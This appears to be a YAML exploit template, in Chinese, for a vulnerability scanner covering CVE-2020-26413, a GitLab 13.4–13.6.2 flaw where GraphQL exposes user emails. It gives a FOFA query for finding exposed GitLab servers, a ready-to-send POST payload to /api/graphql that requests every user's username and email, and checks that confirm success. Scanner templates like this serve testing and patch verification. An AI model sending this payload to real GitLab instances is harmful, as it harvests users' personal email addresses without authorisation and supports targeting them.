product: Gitlab
vName: Gitlab Graphql 邮件地址信息泄露
type: 信息泄漏
vID:
  - CVE-2020-26413
  - CNVD-2021-14193
level: 2
vDesc: Gitlab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git（版本控制系统）项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。Git是一套免费、开源的分布式版本控制系统。GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2存在信息泄露漏洞，该漏洞源于通过GraphQL公开信息会导致用户的电子邮件可见。
version: GitLab 13.4 - 13.6.2
note: ''
search:
  FOFA: app="GitLab"
protocol: http
link: https://github.com/tzwlhack/Vulnerability/blob/main/GitLab Graphql 邮件地址信息泄露 (CVE-2020-26413).md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /api/graphql
      json:
        query: "{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }"
        variables: null
        operationName: null
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - username
              - avatarUrl
            logic: and